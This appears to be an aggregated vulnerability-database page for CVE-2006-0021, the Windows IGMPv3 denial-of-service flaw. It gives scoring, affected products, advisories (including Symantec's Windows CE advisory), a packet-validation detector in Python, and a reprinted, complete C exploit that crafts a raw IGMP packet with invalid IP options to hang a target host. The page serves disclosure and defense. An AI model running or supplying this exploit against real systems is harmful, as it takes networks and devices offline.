CVE-2006-0021
CVSS 7.8
Published: 2006-02-14 14:06:00
Revised: 2011-03-07 00:00:00

[Original] Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability."


[CNNVD] Microsoft Windows malformed IGMPv3 packet remote denial of service vulnerability (CNNVD-200602-199)

        Microsoft Windows is a very popular operating system published by Microsoft.
        The Microsoft Windows TCP/IP stack mishandles IGMPv3 packets, and a remote attacker can use this flaw to perform a remote denial of service attack against a host. The Windows TCP/IP implementation fails to process specially crafted IGMP packets correctly, so an unauthenticated remote attacker can send a crafted IGMP packet carrying an invalid IP option to a vulnerable system and cause it to stop responding. IGMP packets can be sent by unicast or multicast, so without appropriate network filtering a single packet can trigger this vulnerability on many devices at once.
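The record above describes the trigger condition as an IGMP packet whose IP options are invalid, and names network filtering as the mitigation. As an added example (not part of the CNNVD record, the exploit, or any Microsoft code), the Python check below parses an IPv4 header, walks the RFC 791 option TLVs, and flags IGMP packets whose options are malformed or are anything other than the Router Alert option that IGMPv3 queries legitimately carry. The function names, the "only Router Alert is expected on IGMP" policy, and every sample packet are constructed assumptions for this example.

```python
"""Classify IGMP packets by the sanity of their IPv4 options (constructed example)."""
import struct
from typing import List, Optional, Tuple

IPPROTO_IGMP = 2
OPT_EOOL, OPT_NOP, OPT_ROUTER_ALERT = 0x00, 0x01, 0x94


def parse_ip_options(options: bytes) -> Optional[List[Tuple[int, bytes]]]:
    """Walk RFC 791 option TLVs; return [(type, data), ...] or None if malformed."""
    found, i = [], 0
    while i < len(options):
        kind = options[i]
        if kind == OPT_EOOL:
            break                      # end of option list; rest is padding
        if kind == OPT_NOP:
            i += 1
            continue
        if i + 1 >= len(options):
            return None                # type byte with no length byte
        length = options[i + 1]
        if length < 2 or i + length > len(options):
            return None                # length too small or overruns the header
        found.append((kind, options[i + 2:i + length]))
        i += length
    return found


def classify_igmp_packet(pkt: bytes) -> str:
    """Return 'truncated', 'not-igmp', 'malformed-options', 'unexpected-options' or 'ok'."""
    if len(pkt) < 20:
        return "truncated"
    ver_ihl, proto = pkt[0], pkt[9]
    total_len = struct.unpack("!H", pkt[2:4])[0]
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or ihl > len(pkt) or ihl > total_len:
        return "truncated"
    if proto != IPPROTO_IGMP:
        return "not-igmp"
    opts = parse_ip_options(pkt[20:ihl])
    if opts is None:
        return "malformed-options"
    # Policy assumption: the only option expected on IGMP is Router Alert
    # (RFC 2113: type 0x94, length 4, value 0). Any other option, or a
    # padded-out options field carrying no real option, is flagged.
    if ihl > 20 and opts != [(OPT_ROUTER_ALERT, b"\x00\x00")]:
        return "unexpected-options"
    return "ok"


def build_ipv4(options: bytes, payload: bytes, proto: int = IPPROTO_IGMP) -> bytes:
    """Constructed IPv4 header for test input (checksum left 0; not validated here)."""
    options += b"\x00" * (-len(options) % 4)          # pad to a 32-bit boundary
    ihl = 5 + len(options) // 4
    hdr = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl, 0, 20 + len(options) + len(payload),
                      0, 0, 1, proto, 0, bytes([192, 0, 2, 1]), bytes([224, 0, 0, 1]))
    return hdr + options + payload


# Constructed 12-byte IGMPv3 General Query body (type 0x11), checksum left 0.
IGMP_QUERY = bytes([0x11, 0x64, 0, 0, 0, 0, 0, 0, 0x02, 0x7D, 0, 0])
GOOD = build_ipv4(bytes([OPT_ROUTER_ALERT, 4, 0, 0]), IGMP_QUERY)   # -> "ok"
BAD_LEN = build_ipv4(bytes([0x83, 7, 0x04]), IGMP_QUERY)            # -> "malformed-options"
PADDED = build_ipv4(bytes([1, 1, 1, 0]), IGMP_QUERY)                # -> "unexpected-options"
```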

- CVSS (base score)

CVSS score: 7.8 [HIGH]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: COMPLETE [may bring the system down completely]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2003_server:standard:sp1
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_xp::gold:professional  Microsoft Windows XP Professional Gold
cpe:/o:microsoft:windows_xp::sp2:home
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_xp::sp2:media_center  Microsoft Windows XP SP2 Media Center
cpe:/o:microsoft:windows_xp::sp1:embedded  Microsoft Windows XP SP1 Embedded
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_xp::sp2:tablet_pc  Microsoft Windows XP SP2 Tablet PC
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_xp:::embedded
cpe:/o:microsoft:windows_2003_server:standard_64-bit
cpe:/o:microsoft:windows_2003_server:web:sp1
cpe:/o:microsoft:windows_2003_server:datacenter_64-bit:sp1
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2003_server:r2:sp1
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_2003_server:enterprise:sp1
cpe:/o:microsoft:windows_xp::sp1:media_center  Microsoft Windows XP SP1 Media Center

- OVAL (technical details for detection)

oval:org.mitre.oval:def:678  TCP/IP IGMP v3 Denial of Service (Server 2003, SP1)
oval:org.mitre.oval:def:1662  TCP/IP IGMP v3 Denial of Service (XP, SP1)
oval:org.mitre.oval:def:1647  TCP/IP IGMP v3 Denial of Service (64-bit XP, SP1)
oval:org.mitre.oval:def:1425  TCP/IP IGMP v3 Denial of Service (XP, SP2)
oval:org.mitre.oval:def:1310  TCP/IP IGMP v3 Denial of Service (Server 2003)
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definitions for more technical detail on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0021
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0021
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-199
(official data source) CNNVD

- Other links and resources

http://www.us-cert.gov/cas/techalerts/TA06-045A.html
(VENDOR_ADVISORY)  CERT  TA06-045A
http://www.kb.cert.org/vuls/id/839284
(VENDOR_ADVISORY)  CERT-VN  VU#839284
http://www.securityfocus.com/bid/16645
(PATCH)  BID  16645
http://www.microsoft.com/technet/security/bulletin/ms06-007.mspx
(VENDOR_ADVISORY)  MS  MS06-007
http://secunia.com/advisories/18853
(VENDOR_ADVISORY)  SECUNIA  18853
http://xforce.iss.net/xforce/xfdb/24489
(UNKNOWN)  XF  win-igmpv3-dos(24489)
http://www.vupen.com/english/advisories/2006/0576
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0576
http://www.securityfocus.com/archive/1/archive/1/482658/30/4350/threaded
(UNKNOWN)  BUGTRAQ  20071023 SYMSA-2007-012: Microsoft Windows CE IGMP Denial of Service
http://www.securiteam.com/exploits/5PP0T0KI0O.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5PP0T0KI0O.html
http://www.milw0rm.com/exploits/1599
(UNKNOWN)  MILW0RM  1599
http://securitytracker.com/id?1015629
(UNKNOWN)  SECTRACK  1015629

- Vulnerability information

Microsoft Windows malformed IGMPv3 packet remote denial of service vulnerability
High risk  Design error
2006-02-14 00:00:00 2006-04-19 00:00:00
Remote

- Advisory and patch

        The vendor has released an update that fixes this security issue; patch download link:
        http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

- Vulnerability information (1599)

MS Windows XP/2003 (IGMP v3) Denial of Service Exploit (MS06-007) (EDBID:1599)
windows dos
2006-03-21 Verified
0 Alexey Sintsov
N/A
/*
        IGMP v3 DoS Exploit

        ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
        ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx


        by Alexey Sintsov (dookie@inbox.ru)


        Req:

                Administrator rights on system
                Windows Firewall off (for sending RAW packets)

        Affected Products:
                Microsoft Corporation Windows XP All
                Microsoft Corporation Windows Server 2003 All
 */


#include <stdio.h>
#include <stdlib.h>     // exit()
#include <string.h>     // memcpy(), memset()
#include <winsock2.h>


#pragma comment(lib, "Ws2_32.lib")

typedef struct iphdr
{

        unsigned char  verlen;                  // IP version & length
        unsigned char  tos;                             // Type of service
        unsigned short total_len;               // Total length of the packet
        unsigned short ident;                   // Unique identifier
        unsigned short frag_and_flags;  // Flags
        unsigned char  ttl;                             // Time to live
        unsigned char  proto;                   // Protocol (TCP, UDP etc)
        unsigned short checksum;                // IP checksum
        unsigned int   sourceIP;                // Source IP
        unsigned int   destIP;                  // Destination IP
        unsigned short  options[2];

} IPHEADER;




typedef struct igmphdr {
          unsigned char                 type;
          unsigned char                 code;
                  unsigned short        checksum;
                  unsigned long                 group;
                  unsigned char                 ResvSQVR;
                  unsigned char                 QQIC;
                  unsigned short                num;
                  unsigned long                 addes;

 } IGMPHEADER;






USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum=0;

    while (size > 1) {
        cksum += *buffer++;
        size  -= sizeof(USHORT);
    }

    if (size)
        cksum += *(UCHAR*)buffer;

    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16);

    return (USHORT)(~cksum);
}

int sendIGMP(char* a, char* b)
{


        unsigned int dst_addr, src_addr;

        IPHEADER ipHeader;
        IGMPHEADER igmpHeader;



        dst_addr=inet_addr (b);
        src_addr=inet_addr (a);


        char szSendBuf[60]={0};
        int rect;

        WSADATA WSAData;
        if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
                return FALSE;

        SOCKET sock;
        if ((sock = WSASocket(AF_INET,SOCK_RAW,
                IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
                printf("Create socket error");
                WSACleanup();
                return FALSE;
        }


        BOOL flag=TRUE;
        if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
                printf("Set options error");
                closesocket(sock);
                WSACleanup();
                return FALSE;
        }



        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family=AF_INET;
        ssin.sin_port=htons(99);
        ssin.sin_addr.s_addr=dst_addr;


        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));


        ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));


        ipHeader.ident=htons(0);

        ipHeader.frag_and_flags=0;

        ipHeader.ttl=128;
        ipHeader.proto=IPPROTO_IGMP;

        ipHeader.checksum=0;


        ipHeader.tos=0;

        ipHeader.destIP=dst_addr;
        ipHeader.sourceIP=src_addr;

        //Ip options
        ipHeader.options[0]=htons(0x0000); //bug is here =)
        ipHeader.options[1]=htons(0x0000);


        igmpHeader.type=0x11; //v3 Membership Query
        igmpHeader.code=5;
        igmpHeader.num=htons(1);
        igmpHeader.ResvSQVR=0x0;
        igmpHeader.QQIC=0;
        igmpHeader.group=inet_addr("0.0.0.0");
        igmpHeader.addes=dst_addr;

        igmpHeader.checksum=0;


        memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

        igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

        ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));


        rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

        if (rect==SOCKET_ERROR) {
                printf("Send error: <%d>\n",WSAGetLastError());
                closesocket(sock);
                WSACleanup();
                return 0;
        }



        closesocket(sock);
        WSACleanup();



return 1;


}



int main(int argc, char **argv)
{


        if(argc<3)   // both <target ip> and <source ip> are required
        {
                printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
                printf("Usage:\n");
                printf("c:\\igmps.exe <target ip> <source ip>\n\n");
                exit(0);
        }


        sendIGMP(argv[2],  argv[1]);


        return 0;
}

// milw0rm.com [2006-03-21]

- Vulnerability information (F60332)

SYMSA-2007-012.txt (PacketStormID:F60332)
2007-10-23 00:00:00
Ollie Whitehouse  symantec.com
advisory,denial of service
windows,ce
CVE-2006-0021

Symantec Vulnerability Research SYMSA-2007-012 - Microsoft Windows CE suffers from a IGMP related denial of service vulnerability.




                     Symantec Vulnerability Research
                     http://www.symantec.com/research
                           Security Advisory

   Advisory ID: SYMSA-2007-012
Advisory Title: Microsoft Windows CE IGMP Denial of Service
        Author: Ollie Whitehouse / ollie_whitehouse@symantec.com
  Release Date: 22-10-2007
   Application: Windows CE 5.01 / Windows Mobile 5
      Platform: Microsoft Windows
      Severity: Denial of Service
 Vendor status: Update Available
    CVE Number: CVE-2006-0021
     Reference: http://www.securityfocus.com/bid/16645


Overview:

  This issue was originally discovered by Douglas Nascimento of
  Datacom and published in Microsoft security bulletin MS06-007 on
  February 14th 2006 and subsequently updated March 17th 2006. A
  condition exists with the Microsoft IP stack wherein a specially
  crafted IGMP packet causes a denial of service condition. In
  Microsoft's original advisory, Windows CE was omitted as a
  vulnerable platform; however, in Symantec's testing it was
  discovered that Windows CE 5.01 (shipped as part of the Windows
  Mobile 5 PocketPC and SmartPhone editions) is vulnerable. Symantec
  notified Microsoft in February 2006 of the fact that CE was
  affected with Microsoft releasing a patch in KB930642 in
  February 2007.


Details:

  On the day of release Symantec developed a working trigger for this
  vulnerability. A public exploit for this issue was released by
  Alexey Sintsov on the 21st of March 2006. When an IGMP packet is
  supplied with invalid IP options then it will cause a denial of
  service condition. As IGMP can be sent both via unicast and multicast
  it is possible to cause the issue to manifest itself in many devices
  with a single packet if appropriate network filtering is not in place.


Vendor Response:

  There is a security vulnerability that could allow for Denial of
  Service (DoS) by sending a specifically crafted TCP/IP packet to the
  mobile device. However most attempts to exploit this vulnerability
  would result in a Denial of Service Condition on the networking
  capabilities of the device.
  
  The following devices may be vulnerable to this issue:
  
  Windows CE 4.2 - Windows CE .NET 4.2 Platform Builder
      Monthly Update (September 2007)
  Windows Mobile 5.0 - A fix for this issue has been provided by
      Microsoft via  http://support.microsoft.com/kb/930642
  Fixed in Windows Mobile 6.0.


Recommendation:

  Windows Mobile 5.0 customers please see your handset manufacturer to
  obtain the update customized for your device to Windows Mobile 6.

  OEMs which utilise Windows CE should ensure KB930642 is applied to
  their build environment. Details can be found here on Microsoft's
  support site - http://support.microsoft.com/kb/930642/.

  Carriers should ensure appropriate network filtering is in place in
  order to protect affected handsets.


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


  CVE-2006-0021

-------Symantec Vulnerability Research Advisory Information-------

For questions about this advisory, or to report an error:
research@symantec.com

For details on Symantec's Vulnerability Reporting Policy:
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

Symantec Vulnerability Research Advisory Archive:
http://www.symantec.com/research/

Symantec Vulnerability Research GPG Key:
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

-------------Symantec Product Advisory Information-------------

To Report a Security Vulnerability in a Symantec Product:
secure@symantec.com 

For general information on Symantec's Product Vulnerability
reporting and response:
http://www.symantec.com/security/

Symantec Product Advisory Archive:
http://www.symantec.com/avcenter/security/SymantecAdvisories.html

Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc

---------------------------------------------------------------

Copyright (c) 2007 by Symantec Corp.
Permission to redistribute this alert electronically is granted
as long as it is not edited in any way unless authorized by
Symantec Consulting Services. Reprinting the whole or part of
this alert in any medium other than electronically requires
permission from research@symantec.com.

Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use
of, or reliance on, this information.

Symantec, Symantec products, and Symantec Consulting Services are
registered trademarks of Symantec Corp. and/or affiliated companies
in the United States and other countries. All other registered and
unregistered trademarks represented in this document are the sole
property of their respective companies/owners.

- Vulnerability information

23133
Microsoft Windows IGMPv3 Crafted Packet Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-02-14 Unknown
2006-03-21 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Microsoft Windows IGMPv3 Denial of Service Vulnerability
Design Error 16645
Yes No
2006-02-14 12:00:00 2007-10-25 02:26:00
Douglas Nascimento of Datacom is credited with the discovery of this vulnerability. This issue was disclosed in the referenced vendor advisory.

- Affected program versions
</gr_replreplace>
<gr_replace lines="582" cat="clarify" orig="- 漏洞讨论">
- Vulnerability discussion

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Gold 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition

- 漏洞讨论

A vulnerability in the handling of IGMPv3 (Internet Group Management Protocol) packets could result in a denial of service.

An attacker can exploit this issue through a broadcast attack to cause vulnerable computers on the subnet to become unresponsive, effectively denying service to legitimate users.

- Exploit

An exploit is not required.

Proof-of-concept code is available.

- Solution

Microsoft has released security advisory MS06-007 with fixes to address this issue.

Fixes are available for:
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home
Microsoft Windows XP Home SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Media Center Edition
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows XP Professional SP2
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows XP Professional
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP1
Microsoft Windows XP 0
Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- Related references
